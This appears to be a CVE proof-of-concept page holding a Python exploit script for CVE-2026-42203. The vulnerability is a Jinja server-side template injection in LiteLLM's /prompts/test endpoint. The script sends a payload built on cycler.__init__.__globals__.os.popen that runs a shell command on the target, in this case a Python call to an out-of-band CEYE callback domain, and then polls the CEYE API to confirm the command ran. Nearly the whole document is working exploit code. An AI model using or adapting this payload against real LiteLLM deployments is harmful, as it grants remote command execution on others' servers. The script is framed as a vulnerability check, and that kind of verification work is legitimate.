5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE_2026_42203.py PY
#!/usr/bin/env python3
"""
Minimal LiteLLM CVE-2026-42203 /prompts/test SSTI PoC.

Proof strategy:
  Execute Python code that requests: http://{random}.{your-ceye-domain}/
  Then query CEYE request records with filter={random}. If CEYE received the
  callback, the SSTI command execution path is confirmed.

CEYE domain/token and the LiteLLM API key are intentionally not hardcoded.
Pass them with CLI flags or environment variables when running in your lab.
"""

from __future__ import annotations

import argparse
import json
import os
import secrets
import string
import sys
import threading
import time
from typing import Any, Dict, Optional

import requests


DEFAULT_TARGET = "http://127.0.0.1:4000"
DEFAULT_MODEL = "gpt-3.5-turbo"
DEFAULT_API_KEY_ENV = "LITELLM_API_KEY"
DEFAULT_CEYE_DOMAIN_ENV = "CEYE_DOMAIN"
DEFAULT_CEYE_TOKEN_ENV = "CEYE_TOKEN"
DEFAULT_CEYE_TYPE = "request"
DEFAULT_TIMEOUT = 10.0
DEFAULT_WAIT = 20.0
DEFAULT_INTERVAL = 3.0

EXIT_VULNERABLE = 0
EXIT_NOT_VULNERABLE = 1
EXIT_CONFIG_ERROR = 2
EXIT_INCONCLUSIVE = 3


def random_filter(length: int = 12) -> str:
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def quote_for_jinja_single_string(value: str) -> str:
    return value.replace("\\", "\\\\").replace("'", "\\'").replace("\n", "\\n")


def build_payload(model: str, command: str) -> Dict[str, Any]:
    command = quote_for_jinja_single_string(command)
    ssti = "{{ cycler.__init__.__globals__.os.popen('" + command + "').read() }}"
    return {
        "dotprompt_content": f"""---
model: {model}
temperature: 0
---

User: {ssti}
""",
        "prompt_variables": {},
    }


def build_python_http_command(url: str) -> str:
    return (
        "python3 -c "
        f"\"import urllib.request; urllib.request.urlopen('{url}', timeout=5).read()\""
    )


def trigger_payload(
    target: str,
    api_key: str,
    body: Dict[str, Any],
    timeout: float,
    verify_tls: bool,
) -> None:
    endpoint = target.rstrip("/") + "/prompts/test"
    try:
        requests.post(
            endpoint,
            headers={
                "Authorization": f"Bearer {api_key}",
                "Content-Type": "application/json",
            },
            json=body,
            timeout=timeout,
            verify=verify_tls,
        )
    except requests.RequestException as exc:
        print(f"[!] Background trigger request error: {exc}")


def start_trigger_payload(
    target: str,
    api_key: str,
    body: Dict[str, Any],
    timeout: float,
    verify_tls: bool,
) -> None:
    endpoint = target.rstrip("/") + "/prompts/test"
    thread = threading.Thread(
        target=trigger_payload,
        kwargs={
            "target": target,
            "api_key": api_key,
            "body": body,
            "timeout": timeout,
            "verify_tls": verify_tls,
        },
        daemon=True,
    )
    thread.start()
    print(f"[*] Sending payload to: POST {endpoint}")


def query_ceye(
    token: str,
    record_type: str,
    filter_value: str,
    timeout: float,
) -> Dict[str, Any]:
    response = requests.get(
        "http://api.ceye.io/v1/records",
        params={
            "token": token,
            "type": record_type,
            "filter": filter_value,
        },
        timeout=timeout,
    )
    response.raise_for_status()
    return response.json()


def ceye_has_callback(data: Dict[str, Any], filter_value: str) -> bool:
    return filter_value in json.dumps(data, ensure_ascii=False)


def poll_ceye(
    token: str,
    record_type: str,
    filter_value: str,
    wait: float,
    interval: float,
    timeout: float,
) -> bool:
    deadline = time.time() + wait
    last_error: Optional[str] = None

    while time.time() <= deadline:
        try:
            data = query_ceye(token, record_type, filter_value, timeout)
            if ceye_has_callback(data, filter_value):
                print(f"[+] CEYE matched filter: {filter_value}")
                print(json.dumps(data, ensure_ascii=False, indent=2))
                return True
        except (requests.RequestException, ValueError) as exc:
            last_error = str(exc)

        time.sleep(interval)

    if last_error:
        print(f"[!] Last CEYE query error: {last_error}")
    return False


def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(
        description="Minimal LiteLLM /prompts/test SSTI PoC with CEYE request callback."
    )
    parser.add_argument("-t", "--target", default=DEFAULT_TARGET, help=f"LiteLLM base URL, default: {DEFAULT_TARGET}")
    parser.add_argument(
        "--auth",
        "--api-key",
        dest="api_key",
        default=os.getenv(DEFAULT_API_KEY_ENV, ""),
        help=f"LiteLLM key allowed to call /prompts/test. Can also be set with {DEFAULT_API_KEY_ENV}.",
    )
    parser.add_argument("--model", default=DEFAULT_MODEL, help=f"dotprompt model value, default: {DEFAULT_MODEL}")
    parser.add_argument(
        "--ceye-token",
        default=os.getenv(DEFAULT_CEYE_TOKEN_ENV, ""),
        help=f"CEYE API token. Can also be set with {DEFAULT_CEYE_TOKEN_ENV}.",
    )
    parser.add_argument(
        "--ceye-domain",
        default=os.getenv(DEFAULT_CEYE_DOMAIN_ENV, ""),
        help=f"CEYE domain. Can also be set with {DEFAULT_CEYE_DOMAIN_ENV}.",
    )
    parser.add_argument("--ceye-type", default=DEFAULT_CEYE_TYPE, help=f"CEYE record type, default: {DEFAULT_CEYE_TYPE}")
    parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT, help=f"HTTP timeout, default: {DEFAULT_TIMEOUT}s")
    parser.add_argument("--wait", type=float, default=DEFAULT_WAIT, help=f"Seconds to wait for CEYE callback, default: {DEFAULT_WAIT}s")
    parser.add_argument("--interval", type=float, default=DEFAULT_INTERVAL, help=f"CEYE polling interval, default: {DEFAULT_INTERVAL}s")
    parser.add_argument("--insecure", action="store_true", help="Disable TLS certificate verification for target request")
    return parser.parse_args()


def validate_args(args: argparse.Namespace) -> Optional[str]:
    if not args.target.strip():
        return "--target must not be empty"
    if not args.api_key.strip():
        return "--auth/--api-key must not be empty"
    if not args.ceye_token.strip():
        return "--ceye-token must not be empty"
    if not args.ceye_domain.strip():
        return "--ceye-domain must not be empty"
    if args.timeout <= 0:
        return "--timeout must be greater than 0"
    if args.wait <= 0:
        return "--wait must be greater than 0"
    if args.interval <= 0:
        return "--interval must be greater than 0"
    return None


def main() -> int:
    args = parse_args()
    validation_error = validate_args(args)
    if validation_error:
        print(f"[CONFIG_ERROR] {validation_error}", file=sys.stderr)
        return EXIT_CONFIG_ERROR

    filter_value = random_filter()
    callback_url = f"http://{filter_value}.{args.ceye_domain}/"
    command = build_python_http_command(callback_url)
    body = build_payload(args.model, command)

    print(f"[*] Python payload: {command}")
    print(
        "[*] CEYE query: "
        f"http://api.ceye.io/v1/records?token={args.ceye_token}&type={args.ceye_type}&filter={filter_value}"
    )

    start_trigger_payload(
        target=args.target,
        api_key=args.api_key,
        body=body,
        timeout=args.timeout,
        verify_tls=not args.insecure,
    )

    if poll_ceye(
        token=args.ceye_token,
        record_type=args.ceye_type,
        filter_value=filter_value,
        wait=args.wait,
        interval=args.interval,
        timeout=args.timeout,
    ):
        print("[VULNERABLE] CEYE received the callback request.")
        return EXIT_VULNERABLE

    print("[NOT_VULNERABLE] CEYE did not receive the callback request within the wait window.")
    return EXIT_NOT_VULNERABLE


if __name__ == "__main__":
    raise SystemExit(main())